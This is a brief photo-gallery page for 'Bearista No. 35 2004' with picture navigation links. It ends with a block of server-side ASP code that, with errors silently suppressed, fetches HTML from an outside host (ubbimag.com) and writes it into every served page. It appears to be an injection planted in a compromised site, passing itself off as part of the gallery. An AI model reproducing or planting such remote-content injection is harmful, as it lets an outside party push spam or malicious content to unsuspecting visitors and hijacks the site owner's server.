Bearista No. 35 2004
First |
Previous Picture |
Next Picture |
Last | Thumbnails
<%
On Error Resume Next
set XmlObj = Server.CreateObject("Microsoft.XMLHTTP")
XmlObj.open "GET", "http://ubbimag.com/z10.html", false
XmlObj.send
formatdata = XmlObj.responseText
file_get_contents=formatdata
Set XmlObj = nothing
response.write file_get_contents
%>